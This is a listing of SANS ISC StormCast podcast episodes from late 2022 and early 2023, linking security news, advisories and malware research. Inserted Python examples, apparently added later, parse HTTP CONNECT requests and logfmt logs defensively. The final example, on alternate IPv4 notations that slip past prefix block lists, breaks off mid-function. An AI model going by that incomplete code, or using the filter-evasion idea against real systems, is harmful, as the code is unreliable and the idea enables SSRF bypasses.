Passive Detection of Internet-Connected Systems Affected by Exploited Vulnerabilities https://isc.sans.edu/diary/Passive%20detection%20of%20internet-connected%20systems%20affected%20by%20vulnerabilities%20from%20the%20CISA%20KEV%20catalog/29426 Unauthenticated Remote DoS in ksmbd NTLMv2 Authentication https://seclists.org/oss-sec/2023/q1/4 Cisco RV Series Vulnerabilities CVE-2023-20025 https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sbr042-multi-vuln-ej76Pke5 Zoom Updates https://explore.zoom.us/en/trust/security/security-bulletin/ Gootkit Abusing VLC https://www.trendmicro.com/en_us/research/23/a/gootkit-loader-actively-targets-the-australian-healthcare-indust.html
1/12/2023, 6 minutes, 13 seconds

ISC StormCast for Wednesday, January 11th, 2023

Microsoft January 2023 Patch Tuesday https://isc.sans.edu/diary/Microsoft%20January%202023%20Patch%20Tuesday/29420 Cacti Unauthenticated Remote Code Execution https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution/ On the Security Vulnerabilities of Text-to-SQL Models https://arxiv.org/pdf/2211.15363.pdf
1/11/2023, 5 minutes, 47 seconds

ISC StormCast for Tuesday, January 10th, 2023

New Year Old Tricks: Hunting for CircleCI Configuration Files https://isc.sans.edu/diary/New%20year%2C%20old%20tricks%3A%20Hunting%20for%20CircleCI%20configuration%20files/29416 Amazon S3 Encrypts New Objects By Default https://aws.amazon.com/blogs/aws/amazon-s3-encrypts-new-objects-by-default/ MatrixSSL Buffer Overflow https://github.com/matrixssl/matrixssl/security/advisories/GHSA-fmwc-gwc5-2g29 Auth0 JsonWebToken Vulnerability CVE-2022-23529 https://unit42.paloaltonetworks.com/jsonwebtoken-vulnerability-cve-2022-23529/
1/10/2023, 6 minutes, 3 seconds

ISC StormCast for Monday, January 9th, 2023

Reversing AutoIT Scripts https://isc.sans.edu/diary/AutoIT%20Remains%20Popular%20in%20the%20Malware%20Landscape/29408 Can You Trust Your VSCode Extensions https://blog.aquasec.com/can-you-trust-your-vscode-extensions A Deep Dive Into Powerat https://blog.phylum.io/a-deep-dive-into-powerat-a-newly-discovered-stealer/rat-combo-polluting-pypi
1/9/2023, 5 minutes, 48 seconds

ISC StormCast for Friday, January 6th, 2023

More Brazil Malspam Pushing Astaroth (Guildma) in January 2023 https://isc.sans.edu/forums/diary/More%20Brazil%20malspam%20pushing%20Astaroth%20%28Guildma%29%20in%20January%202023/29404/ CircleCI Breach https://circleci.com/blog/january-4-2023-security-alert/ Twitter Leak https://www.bleepingcomputer.com/news/security/200-million-twitter-users-email-addresses-allegedly-leaked-online/ Slack Source Code Leak https://slack.com/blog/news/slack-security-update Control Web Panel Patch CVE-2022-44877 https://github.com/numanturle/CVE-2022-44877 Turla: A Galaxy of Opportunity https://www.mandiant.com/resources/blog/turla-galaxy-opportunity
1/6/2023, 5 minutes, 52 seconds

ISC StormCast for Thursday, January 5th, 2023

Update to RTRBK - Diff and File Dates in PowerShell https://isc.sans.edu/diary/Update%20to%20RTRBK%20-%20Diff%20and%20File%20Dates%20in%20PowerShell/29400 Google Chrome Sunsetting Legacy Windows Support https://support.google.com/chrome/thread/185534985/sunsetting-support-for-windows-7-8-8-1-in-early-2023?hl=en SHC used to compile cryptominer malware https://asec.ahnlab.com/en/45182/ ManageEngine Password Manager Pro SQL Injection https://pitstop.manageengine.com/portal/en/community/topic/manageengine-security-advisory important-security-fix-released-for-manageengine-password-manager-pro-2-1-2023#:~:text=critical%20security%20vulnerability FortiADC Command Injection in Web Interface https://www.fortiguard.com/psirt/FG-IR-22-061 Raspberry Robin Developments https://www.securityjoes.com/post/raspberry-robin-detected-itw-targeting-insurance-financial-institutes-in-europe
1/5/2023, 7 minutes, 13 seconds

ISC StormCast for Wednesday, January 4th, 2023

NTP Fingerprinting https://isc.sans.edu/diary/Its%20about%20time%3A%20OS%20Fingerprinting%20using%20NTP/29394
Misc Car Vulnerabilities https://samcurry.net/web-hackers-vs-the-auto-industry/
Flipper Zero Phishing https://twitter.com/AlvieriD/status/1609945425871609858
Trend Micro Patch https://helpcenter.trendmicro.com/en-us/article/TMKA-11252
Packet Tuesday: IP Options https://www.youtube.com/watch?v=HldNL3SLLwM
1/4/2023, 6 minutes, 31 seconds

ISC StormCast for Tuesday, January 3rd, 2023

Kyverno's container image signature verification bypass https://www.armosec.io/blog/cve-2022-47633-kyvernos-container-image-signature-verification/
Google Smart Speaker Vulnerability https://downrightnifty.me/blog/2022/12/26/hacking-google-home.html
Verizon Decommissions 3G CDMA Network https://www.fiercewireless.com/wireless/verizon-tells-3g-customers-upgrade-they-lose-service
EarSpy: Spying Caller Speech and Identity Through Speaker Vibrations https://arxiv.org/pdf/2212.12151.pdf
1/3/2023, 5 minutes, 52 seconds

ISC StormCast for Monday, January 2nd, 2023

SPF and DMARC use on GOV domains in different ccTLDs https://isc.sans.edu/forums/diary/SPF+and+DMARC+use+on+GOV+domains+in+different+ccTLDs/29384/
CVE-2022-47939 ksmbd Vulnerability https://ubuntu.com/security/CVE-2022-47939
Netgear Vulnerabilities https://kb.netgear.com/000065495/Security-Advisory-for-Pre-Authentication-Buffer-Overflow-on-Some-Routers-PSV-2019-0208
PyTorch Malicious Dependency https://pytorch.org/blog/compromised-nightly-dependency/
1/2/2023, 6 minutes, 23 seconds

ISC StormCast for Friday, December 23rd, 2022

Exchange OWASSRF Exploited for Remote Code Execution https://isc.sans.edu/forums/diary/Exchange%20OWASSRF%20Exploited%20for%20Remote%20Code%20Execution/29374/
ksmbd Vulnerability https://www.zerodayinitiative.com/advisories/ZDI-22-1690/
LastPass Incident Update https://blog.lastpass.com/2022/12/notice-of-recent-security-incident/
12/23/2022, 6 minutes, 35 seconds

ISC StormCast for Thursday, December 22nd, 2022

Quick NTP Measurement https://isc.sans.edu/diary/Can%20you%20please%20tell%20me%20what%20time%20it%20is%3F%20Adventures%20with%20public%20NTP%20servers./29368
FBI Favors Ad Blockers https://www.ic3.gov/Media/Y2022/PSA221221
Hidden Costs of Parental Control Apps https://sec-consult.com/blog/detail/the-hidden-costs-of-parental-control-apps/
ProxyNotShell Mitigation Bypass https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/
12/22/2022, 6 minutes

ISC StormCast for Wednesday, December 21st, 2022

Linux File System Monitoring and Actions https://isc.sans.edu/diary/Linux%20File%20System%20Monitoring%20%26%20Actions/29362
Feed of NTP Server IP Addresses https://isc.sans.edu/api/threatlist/ntpservers?json
Feed of Mastodon Server IP Addresses https://isc.sans.edu/api/threatlist/mastodon?json
Packet Tuesday: TLS Server Hello https://www.youtube.com/watch?v=2HymU4dxWEQ
Android Preparing Support for Updatable Root Certificates https://blog.esper.io/android-14-updatable-certificates/
Elastic IP Hijacking https://www.mitiga.io/blog/elastic-ip-hijacking-a-new-attack-vector-in-aws
Microsoft Fixes Hyper-V Issues With Latest Patch https://learn.microsoft.com/en-us/windows/release-health/windows-message-center#2988
12/21/2022, 7 minutes, 20 seconds

ISC StormCast for Tuesday, December 20th, 2022

Hunting for Mastodon Servers https://isc.sans.edu/diary/Hunting%20for%20Mastodon%20Servers/29358
KB5021233 Blue Screen https://learn.microsoft.com/en-us/windows/release-health/status-windows-10-22H2#2986msgdesc
Edge Update will disable Internet Explorer in February https://learn.microsoft.com/en-us/deployedge/edge-learnmore-neededge
Gatekeeper's Achilles heel: Unearthing a macOS vulnerability https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/
Corsair Bug not causing keystroke logging https://arstechnica.com/gadgets/2022/12/corsair-says-bug-not-keylogger-behind-some-k100-keyboards-creepy-behavior/
SentinelSneak: Malicious PyPI module poses as security software development kit
12/20/2022, 6 minutes, 19 seconds

ISC StormCast for Monday, December 19th, 2022

Infostealer Malware with Double Extension https://isc.sans.edu/diary/Infostealer%20Malware%20with%20Double%20Extension/29354
Client Side Encryption For Gmail https://workspaceupdates.googleblog.com/2022/12/client-side-encryption-for-gmail-beta.html
Google Releases OSV Scanner https://github.com/google/osv-scanner/releases/tag/v1.0.1
Samba Security Patches https://thehackernews.com/2022/12/samba-issues-security-updates-to-patch.html
Zyxel Router Buffer Overflow https://sec-consult.com/blog/detail/enemy-within-unauthenticated-buffer-overflows-zyxel-routers/
12/19/2022, 6 minutes, 4 seconds

ISC StormCast for Friday, December 16th, 2022

Google ads lead to fake software pages pushing IcedID (Bokbot) https://isc.sans.edu/diary/Google%20ads%20lead%20to%20fake%20software%20pages%20pushing%20IcedID%20%28Bokbot%29/29344
HTML smugglers turn to SVG images https://blog.talosintelligence.com/html-smugglers-turn-to-svg-images/
GitHub Improvements https://github.blog/2022-12-14-raising-the-bar-for-software-security-next-steps-for-github-com-2fa/
NIST Retires SHA-1 https://www.nist.gov/news-events/news/2022/12/nist-retires-sha-1-cryptographic-algorithm
12/16/2022, 6 minutes, 3 seconds

ISC StormCast for Thursday, December 15th, 2022

Microsoft Patch Issues: https://support.microsoft.com/en-us/topic/december-13-2022-kb5021249-os-build-20348-1366-d5fe7608-bc9d-4055-a88c-fb2fd3d5fd45 https://techcommunity.microsoft.com/t5/ask-the-directory-services-team/so-you-say-your-dc-s-memory-is-getting-all-used-up-after/ba-p/3696318
Critical Remote Code Execution Vulnerability in SPNEGO Extended Negotiation Security Mechanism https://securityintelligence.com/posts/critical-remote-code-execution-vulnerability-spnego-extended-negotiation-security-mechanism/
VMware EHCI Controller Vulnerability CVE-2022-31705 https://www.vmware.com/security/advisories/VMSA-2022-0033.html
Veeam Vulnerability now Exploited https://www.veeam.com/kb4288
nuget / npm / pypi used to host phishing pages https://checkmarx.com/blog/how-140k-nuget-npm-and-pypi-packages-were-used-to-spread-phishing-links/
12/15/2022, 6 minutes, 9 seconds

ISC StormCast for Wednesday, December 14th, 2022

Microsoft Patches https://isc.sans.edu/diary/Microsoft%20December%202022%20Patch%20Tuesday/29336
Apple Patches https://isc.sans.edu/diary/Apple%20Updates%20Everything/29338
Citrix Patches https://www.citrix.com/blogs/2022/12/13/critical-security-update-now-available-for-citrix-adc-citrix-gateway/
12/14/2022, 6 minutes, 28 seconds

ISC StormCast for Tuesday, December 13th, 2022

Quickie: CyberChef Sorting By String Length https://isc.sans.edu/diary/Quickie%3A%20CyberChef%20Sorting%20By%20String%20Length/29328
FortiOS Buffer Overflow https://www.fortiguard.com/psirt/FG-IR-22-398
A Custom Python Backdoor for VMware ESXi Servers https://blogs.juniper.net/en-us/threat-research/a-custom-python-backdoor-for-vmware-esxi-servers
Fuzzing Ping https://tlakh.xyz/fuzzing-ping.html
12/13/2022, 6 minutes, 21 seconds

ISC StormCast for Monday, December 12th, 2022

Fast Port Scanning in PowerShell https://isc.sans.edu/diary/Port%20Scanning%20in%20Powershell%20Redux%3A%20Speeding%20Up%20the%20Results%20%28challenge%20accepted!%29/29324
Bypassing WAFs with JSON https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf
Invisible npm malware evading security checks https://jfrog.com/blog/invisible-npm-malware-evading-security-checks-with-crafted-versions/
PCI Secure Software Standard v1.2 https://docs-prv.pcisecuritystandards.org/Software%20Security/Standard/PCI-Secure-Software-Standard-v1_2.pdf
VMware/vCenter Patches https://www.vmware.com/security/advisories/VMSA-2022-0030.html
12/12/2022, 6 minutes, 42 seconds

ISC StormCast for Friday, December 9th, 2022

Finding Gaps in Syslog https://isc.sans.edu/diary/Finding%20Gaps%20in%20Syslog%20-%20How%20to%20find%20when%20nothing%20happened/29314
Internet Explorer Vulnerability used in Malicious Word Document https://blog.google/threat-analysis-group/internet-explorer-0-day-exploited-by-north-korean-actor-apt37/
Zombinder Obfuscation Service used by Ermac https://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html
Cisco IP Phone Vulnerability CVE-2022-20968 https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ipp-oobwrite-8cMF5r7U
daloRADIUS Vulnerability CVE-2022-23475 https://securityonline.info/cve-2022-23475-account-take-over-flaw-in-open-source-radius-web-management-app/
SANS Holiday Hack Challenge https://www.sans.org/mlp/holiday-hack-challenge/
12/9/2022, 5 minutes, 43 seconds

ISC StormCast for Thursday, December 8th, 2022

ZeroBot / WSZero IoT Botnet https://www.fortinet.com/blog/threat-research/zerobot-new-go-based-botnet-campaign-targets-multiple-vulnerabilities https://blog.netlab.360.com/new-ddos-botnet-wszeor/
Cacti Vulnerability CVE-2022-46169 https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf
Wireshark Updates https://www.wireshark.org/docs/relnotes/wireshark-4.0.2.html
Apple iCloud Security Improvements https://www.apple.com/newsroom/2022/12/apple-advances-user-security-with-powerful-new-data-protections/
12/8/2022, 5 minutes, 10 seconds

ISC StormCast for Wednesday, December 7th, 2022

Mirai Botnet and Gafgyt DDoS Team Up https://isc.sans.edu/forums/diary/Mirai%20Botnet%20and%20Gafgyt%20DDoS%20Team%20Up%20Against%20SOHO%20Routers./29304/
Gafgyt/Mirai Sample; Packet Tuesday; Packet Tuesday Episode 4: TLS Client Hello https://www.youtube.com/playlist?list=PLs4eo9Tja8biVteSW4a3GHY8qi0t1lFLL
Defcon Skimming: A new batch of Web Skimming attacks https://blog.jscrambler.com/defcon-skimming-a-new-batch-of-web-skimming-attacks
Fake D-Link Vulnerability used by Moobot https://vulncheck.com/blog/moobot-uses-fake-vulnerability
Android Patches CVE-2022-20411 https://source.android.com/docs/security/bulletin/2022-12-01?hl=en
12/7/2022, 5 minutes, 32 seconds

ISC StormCast for Tuesday, December 6th, 2022

VLC's Check For Updates: No Updates https://isc.sans.edu/diary/VLCs+Check+For+Updates+No+Updates/29300
AMI MegaRAC Baseboard Management Controller Vulnerabilities https://eclypsium.com/2022/12/05/supply-chain-vulnerabilities-put-server-ecosystem-at-risk/
Netgear IPv6 Firewall Misconfiguration https://medium.com/tenable-techblog/netgear-router-network-misconfiguration-70ac695c81a6
Veritas NetBackup Patch https://www.veritas.com/content/support/en_US/security/VTS22-019
12/6/2022, 5 minutes, 46 seconds

ISC StormCast for Monday, December 5th, 2022

QBot Update https://isc.sans.edu/forums/diary/obama224%20distribution%20Qakbot%20tries%20.vhd%20%28virtual%20hard%20disk%29%20images/29294/
Living off the Land: Unix tools in Windows https://isc.sans.edu/diary/Linux%20LOLBins%20Applications%20Available%20in%20Windows/29296 https://isc.sans.edu/forums/diary/Fingerexe+LOLBin/29298/
CVE-2022-44721 CrowdStrike Falcon Uninstaller https://github.com/purplededa/CVE-2022-44721-CsFalconUninstaller
Android Platform Key Leak https://twitter.com/MishaalRahman/status/1598426974594433025
GitHub Pipeline Vulnerability https://www.legitsecurity.com/blog/artifact-poisoning-vulnerability-discovered-in-rust
12/5/2022, 9 minutes, 2 seconds

ISC StormCast for Friday, December 2nd, 2022

Quarkus Java Framework Vulnerability CVE-2022-4116 https://www.contrastsecurity.com/security-influencers/localhost-attack-against-quarkus-developers-contrast-security https://access.redhat.com/security/cve/CVE-2022-4116
FreeBSD Ping RCE CVE-2022-23093 https://www.freebsd.org/security/advisories/FreeBSD-SA-22:15.ping.asc
NVIDIA GPU Display Driver Vulnerabilities CVE-2022-34669 https://nvidia.custhelp.com/app/answers/detail/a_id/5415
TrustCor CA Revoked https://www.washingtonpost.com/technology/2022/11/30/trustcor-internet-authority-mozilla/
Android Platform Certificates Used to Sign Malware https://bugs.chromium.org/p/apvi/issues/detail?id=100
12/2/2022, 6 minutes, 25 seconds

ISC StormCast for Thursday, December 1st, 2022

What is the deal with these router vulnerabilities https://isc.sans.edu/diary/Whats+the+deal+with+these+router+vulnerabilities/29288/
Apple Updates https://support.apple.com/en-us/HT201222
VLC Media Player Updates CVE-2022-41325 https://www.videolan.org/security/sb-vlc3018.html
VIN used to authenticate to Sirius XM Connected Vehicle Services https://www.theregister.com/2022/11/30/siriusxm_connected_cars_hacking/
12/1/2022, 5 minutes, 42 seconds

ISC StormCast for Wednesday, November 30th, 2022

LinkedIn Bots https://isc.sans.edu/diary/Identifying%20Groups%20of%20%22Bot%22%20Accounts%20on%20LinkedIn/29282
Oracle Fusion Middleware Exploited CVE-2021-35587 https://www.cisa.gov/known-exploited-vulnerabilities-catalog
Windows IKE Flaw Exploited CVE-2022-34721 https://www.cyfirma.com/outofband/windows-internet-key-exchange-ike-remote-code-execution-vulnerability-analysis/
Anker Eufy Cameras Sending Images to Cloud even if asked not to https://www.macrumors.com/2022/11/29/eufy-camera-cloud-uploads-no-user-consent/
Packet Tuesday https://packettuesday.com
SANS Holiday Hack Challenge Sign Up https://www.sans.org/mlp/holiday-hack-challenge/
11/30/2022, 6 minutes, 46 seconds

ISC StormCast for Tuesday, November 29th, 2022

Ukraine Themed Twitter Spam Pushing iOS Scareware https://isc.sans.edu/diary/Ukraine%20Themed%20Twitter%20Spam%20Pushing%20iOS%20Scareware/29276
Google Maps Privacy Issues https://garrit.xyz/posts/2022-11-24-smart-move-google
ACER UEFI BIOS Vulnerabilities https://community.acer.com/en/kb/articles/15520-security-vulnerability-regarding-vulnerability-that-may-allow-changes-to-secure-boot-settings
OpenSSL Usage in UEFI Firmware Exposes Weakness in SBOMs https://www.binarly.io/posts/OpenSSL_Usage_in_UEFI_Firmware_Exposes_Weakness_in_SBOMs/index.html
11/29/2022, 7 minutes, 4 seconds

ISC StormCast for Monday, November 28th, 2022

Log4Shell campaigns are using Nashorn to get reverse shell on victim's machines https://isc.sans.edu/diary/Log4Shell%20campaigns%20are%20using%20Nashorn%20to%20get%20reverse%20shell%20on%20victim%27s%20machines/29266
Attackers Keep Phishing Victims Under Stress https://isc.sans.edu/diary/Attackers%20Keep%20Phishing%20Victims%20Under%20Stress/29270
Vulnerable SDK components lead to supply chain risks in IoT and OT environments https://www.microsoft.com/en-us/security/blog/2022/11/22/vulnerable-sdk-components-lead-to-supply-chain-risks-in-iot-and-ot-environments/
Google Chrome Patches 0-Day https://chromereleases.googleblog.com/2022/11/stable-channel-update-for-desktop_24.html
Hacking Smartwatches for Spear Phishing https://cybervelia.com/?p=1380
11/28/2022, 7 minutes

ISC StormCast for Friday, November 18th, 2022

Lessons Learned from Automatic Failover https://isc.sans.edu/diary/Lessons%20Learned%20from%20Automatic%20Failover%3A%20When%208.8.8.8%20%22disappears%22.%20IPv6%20to%20the%20Rescue%3F/29260
Bitbucket Server and Data Center Vulnerability https://jira.atlassian.com/browse/BSERV-13522
Amazon RDS Snapshot Leaks https://www.mitiga.io/blog/how-mitiga-found-pii-in-exposed-amazon-rds-snapshots
Adobe Commerce merchants to be hit with TrojanOrders this season https://sansec.io/research/trojanorder-magento
SANS EDU Research: Detecting and Mitigating the GateKeeper User Override on macOS in an Enterprise Environment; Antonio Piazza https://www.sans.edu/cyber-research/detecting-and-mitigating-the-gatekeeper-user-override-on-macos-in-an-enterprise-environment/
11/18/2022, 14 minutes, 5 seconds

ISC StormCast for Thursday, November 17th, 2022

Evil Maid Attacks - Remediation for the Cheap https://isc.sans.edu/diary/Evil%20Maid%20Attacks%20-%20Remediation%20for%20the%20Cheap/29256
F5 BIG-IP CVE-2022-41622 and CVE-2022-41800 Vulnerability Details https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/
Details about iPad/iOS Neural Engine Vulnerability CVE-2022-32899 https://github.com/0x36/weightBufs/
Disneyland Malware Team: It's a Puny World After All https://krebsonsecurity.com/2022/11/disneyland-malware-team-its-a-puny-world-after-all/#more-61870
11/17/2022, 6 minutes, 34 seconds

ISC StormCast for Wednesday, November 16th, 2022

Packet Tuesday https://packettuesday.com
Stealing Passwords From Infosec Mastodon - Without Bypassing CSP https://portswigger.net/research/stealing-passwords-from-infosec-mastodon-without-bypassing-csp
SQLi and Access Flaws in Zendesk https://www.varonis.com/blog/zendesk-sql-injection-and-access-flaws
Electric Vehicle Charging Infrastructure https://newsreleases.sandia.gov/ev_security/
11/16/2022, 5 minutes, 24 seconds

ISC StormCast for Tuesday, November 15th, 2022

Extracting "HTTP CONNECT" Requests with Python https://isc.sans.edu/diary/Extracting%20%27HTTP%20CONNECT%27%20Requests%20with%20Python/29246
Windows Kerberos Authentication Breaks After November Updates https://www.bleepingcomputer.com/news/microsoft/windows-kerberos-authentication-breaks-after-november-updates/ https://learn.microsoft.com/en-us/windows/release-health/status-windows-11-22h2#2953msgdesc
Cookies for MFA Bypass Gain Traction Among Cyberattackers https://www.darkreading.com/threat-intelligence/cookies-mfa-bypass-cyberattackers
11/15/2022, 5 minutes, 26 seconds
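The first item above points at a diary on pulling HTTP CONNECT requests out of captured traffic. The block below is an added example written for this listing; it is not the diary's script and not ISC code. It parses the authority-form target ("host:port") out of every CONNECT request line found in reassembled client-to-proxy payloads, counts the targets, and flags tunnels to ports other than the TLS ports a forward proxy is normally expected to carry, since CONNECT to 25, 22 or 3389 through a proxy is a common abuse signal. The sample payloads are constructed for the example, and the function names are this example's own.

```python
import re
from collections import Counter

# Request line of an HTTP CONNECT: "CONNECT host:port HTTP/1.x" (authority-form).
# The host may be a name, an IPv4 literal, or a bracketed IPv6 literal.
CONNECT_LINE = re.compile(
    rb"^CONNECT[ \t]+(\[[0-9A-Fa-f:.]+\]|[^ \t:/\[\]]+):(\d{1,5})[ \t]+HTTP/1\.[01][ \t]*\r?$",
    re.MULTILINE,
)


def extract_connects(payload: bytes):
    """Return a list of (host, port) for every CONNECT request line in payload.

    Lines that look like CONNECT but carry an out-of-range port are skipped.
    """
    found = []
    for m in CONNECT_LINE.finditer(payload):
        host = m.group(1).decode("ascii", "replace")
        port = int(m.group(2))
        if 1 <= port <= 65535:
            found.append((host, port))
    return found


def summarize(connects, expected_ports=(443, 8443)):
    """Count each (host, port) target and list tunnels to unexpected ports."""
    by_target = Counter(connects)
    odd_ports = [c for c in connects if c[1] not in expected_ports]
    return by_target, odd_ports


# Constructed sample: reassembled client->proxy payloads as a forward proxy sees them.
SAMPLE_STREAMS = [
    b"CONNECT www.example.com:443 HTTP/1.1\r\nHost: www.example.com:443\r\n\r\n",
    b"CONNECT www.example.com:443 HTTP/1.1\r\nHost: www.example.com:443\r\n\r\n",
    b"CONNECT [2001:db8::10]:8443 HTTP/1.1\r\nHost: [2001:db8::10]:8443\r\n\r\n",
    b"GET http://www.example.com/ HTTP/1.1\r\nHost: www.example.com\r\n\r\n",  # plain proxy GET, not a tunnel
    b"CONNECT 198.51.100.23:25 HTTP/1.0\r\n\r\n",                               # SMTP through the proxy
    b"CONNECT 198.51.100.23:99999 HTTP/1.1\r\n\r\n",                            # invalid port, skipped
]


def analyze(streams=SAMPLE_STREAMS):
    """Run extraction over every payload and return (Counter of targets, odd-port tunnels)."""
    connects = []
    for s in streams:
        connects.extend(extract_connects(s))
    return summarize(connects)


if __name__ == "__main__":
    targets, odd = analyze()
    for (host, port), n in targets.most_common():
        print(f"{n:3d}  {host}:{port}")
    for host, port in odd:
        print(f"unexpected tunnel target: {host}:{port}")
```

In a real capture the payloads would come from TCP stream reassembly (the regex is anchored at line starts so it also works on a concatenated stream); the port allow-list in summarize() is the policy knob to adjust per proxy.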

ISC StormCast for Monday, November 14th, 2022

Extracting Information From "logfmt" Files with CyberChef https://isc.sans.edu/diary/Extracting%20Information%20From%20%22logfmt%22%20Files%20With%20CyberChef/29244
Soccer World Cup Risks https://www.theregister.com/2022/11/11/world_cup_security/ https://www.welivesecurity.com/2022/11/11/fifa-world-cup-2022-scams-fake-lotteries-ticket-fraud/
Mysterious Company With Government Ties Plays Key Internet Role https://www.washingtonpost.com/technology/2022/11/08/trustcor-internet-addresses-government-connections/
Extortion Scams Hit Website Owners https://www.bleepingcomputer.com/news/security/new-extortion-scam-threatens-to-damage-sites-reputation-leak-data/
11/14/2022, 6 minutes, 5 seconds
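The logfmt diary linked above works the format over in CyberChef. As an added example for this listing (not the diary's recipe and not code from any logfmt library), the block below is a small logfmt parser in Python that handles the parts a regex tends to get wrong, quoted values with backslash escapes and bare flag keys, and runs it over constructed log lines to count failed logins per source address. The sample lines, field names and function names are this example's own.

```python
def parse_logfmt(line: str) -> dict:
    """Parse one logfmt record into a dict.

    Rules implemented (the common Go/Heroku logfmt grammar):
      * key=value pairs separated by spaces or tabs;
      * a key with no '=' is a flag and is stored as True;
      * a value containing spaces or quotes is double-quoted, and inside the
        quotes a backslash escapes the next character ('\\"' and '\\\\').
    Assumption made here: an unterminated quoted value runs to end of line.
    """
    fields = {}
    i, n = 0, len(line)
    while i < n:
        while i < n and line[i] in " \t":
            i += 1
        if i >= n:
            break
        start = i
        while i < n and line[i] not in " \t=":
            i += 1
        key = line[start:i]
        if i >= n or line[i] != "=":
            fields[key] = True          # bare flag such as "retry"
            continue
        i += 1                          # skip '='
        if i < n and line[i] == '"':
            i += 1
            buf = []
            while i < n and line[i] != '"':
                if line[i] == "\\" and i + 1 < n:
                    i += 1              # escaped character: take it literally
                buf.append(line[i])
                i += 1
            i += 1                      # skip the closing quote
            fields[key] = "".join(buf)
        else:
            start = i
            while i < n and line[i] not in " \t":
                i += 1
            fields[key] = line[start:i]
    return fields


# Constructed sample records in logfmt, the shape many Go services emit.
SAMPLE_LINES = [
    'ts=2022-11-14T08:01:12Z level=info msg="request complete" method=GET path=/login status=200 src=203.0.113.7 dur=12ms',
    'ts=2022-11-14T08:01:13Z level=warn msg="auth failed" method=POST path=/login status=401 src=203.0.113.7 user="bob \\"admin\\""',
    'ts=2022-11-14T08:01:14Z level=warn msg="auth failed" method=POST path=/login status=401 src=203.0.113.7 user=carol',
    'ts=2022-11-14T08:01:15Z level=error msg="backend timeout" path=/api/export status=504 src=198.51.100.9 retry',
]


def failed_logins_by_source(lines):
    """Count 401 responses on /login per client address, a simple brute-force indicator."""
    counts = {}
    for rec in map(parse_logfmt, lines):
        if rec.get("path") == "/login" and rec.get("status") == "401":
            counts[rec["src"]] = counts.get(rec["src"], 0) + 1
    return counts


if __name__ == "__main__":
    for src, n in failed_logins_by_source(SAMPLE_LINES).items():
        print(f"{src}: {n} failed logins")
```

The second sample line is the case worth testing any logfmt extraction against: the quoted user name contains escaped quotes, so a split on spaces or a naive `key="([^"]*)"` regex returns the wrong value.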

ISC StormCast for Friday, November 11th, 2022

Do you collect "Observables" or "IOCs"? https://isc.sans.edu/diary/Do%20you%20collect%20%22Observables%22%20or%20%22IOCs%22%3F/29238
Android Update fixes Lock Screen Bypass https://source.android.com/docs/security/bulletin/2022-11-01 https://bugs.xdavidhu.me/google/2022/11/10/accidental-70k-google-pixel-lock-screen-bypass/
libxml2 Vulnerability Details https://gitlab.gnome.org/GNOME/libxml2/-/issues/381
CVE-2022-45063: xterm remote code execution vulnerability https://www.openwall.com/lists/oss-security/2022/11/10/1
11/11/2022, 6 minutes, 49 seconds

ISC StormCast for Thursday, November 10th, 2022

Another Script-Based Ransomware https://isc.sans.edu/diary/Another%20Script-Based%20Ransomware/29234
Apple Security Updates https://support.apple.com/en-us/HT201222
Lenovo UEFI Patch https://www.welivesecurity.com/2022/04/19/when-secure-isnt-secure-uefi-vulnerabilities-lenovo-consumer-laptops/
Foxit Update https://www.foxit.com/support/security-bulletins.html
SAP Update https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10
11/10/2022, 5 minutes, 14 seconds

ISC StormCast for Wednesday, November 9th, 2022

Microsoft Patches https://isc.sans.edu/diary/Microsoft%20November%202022%20Patch%20Tuesday/29230
VMware Workspace ONE Updates CVE-2022-31686, CVE-2022-31687, CVE-2022-31688 https://www.vmware.com/security/advisories/VMSA-2022-0028.html
Citrix Gateway / Citrix ADC Vulnerabilities CVE-2022-27510, CVE-2022-27513, CVE-2022-27516 https://support.citrix.com/article/CTX463706/citrix-gateway-and-citrix-adc-security-bulletin-for-cve202227510-cve202227513-and-cve202227516
Microsoft Exchange Updates https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/ https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2022-exchange-server-security-updates/ba-p/3669045
11/9/2022, 7 minutes, 29 seconds

ISC StormCast for Tuesday, November 8th, 2022

IPv4 Address Representations https://isc.sans.edu/diary/IPv4%20Address%20Representations/29224
Azure AD Certificate-based Authentication (CBA) on Mobile https://techcommunity.microsoft.com/t5/microsoft-entra-azure-ad-blog/azure-ad-certificate-based-authentication-cba-on-mobile/ba-p/2365672
Twitter Scams https://nakedsecurity.sophos.com/2022/11/04/twitter-blue-badge-email-scams-dont-fall-for-them/
Facebook Personal Information Removal https://www.facebook.com/contacts/removal
RSA Conference Finds Unencrypted Confidential Data in WiFi Traffic https://www.darkreading.com/remote-workforce/unencrypted-traffic-weak-e-mail-passwords-still-undermining-wifi-security
11/8/2022, 6 minutes, 3 seconds
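The "IPv4 Address Representations" diary linked above concerns the alternate spellings of an IPv4 address that inet_aton-style parsers accept: a single 32-bit decimal number, hexadecimal or octal components, and fewer than four components. The block below is an added example written for this listing, not code from the diary or from SANS ISC. It implements that parsing grammar itself rather than calling the platform's inet_aton (so the behaviour is the same on every OS), then contrasts a string-prefix block list of the kind found in SSRF and egress filters with a check that normalizes the address first. The function names and sample addresses are this example's own.

```python
import ipaddress
import re

# Each dotted component, as accepted by BSD/glibc inet_aton(3), which many libc-based
# clients and proxies still use:  0x1F / 0X1F hexadecimal,  017 octal (leading zero),  31 decimal.
_HEX = re.compile(r"0[xX][0-9a-fA-F]+")
_OCT = re.compile(r"0[0-7]*")
_DEC = re.compile(r"[1-9][0-9]*")


def _component(s: str) -> int:
    if _HEX.fullmatch(s):
        return int(s, 16)
    if _OCT.fullmatch(s):        # also matches a lone "0"; rejects "08" and "09"
        return int(s, 8)
    if _DEC.fullmatch(s):
        return int(s, 10)
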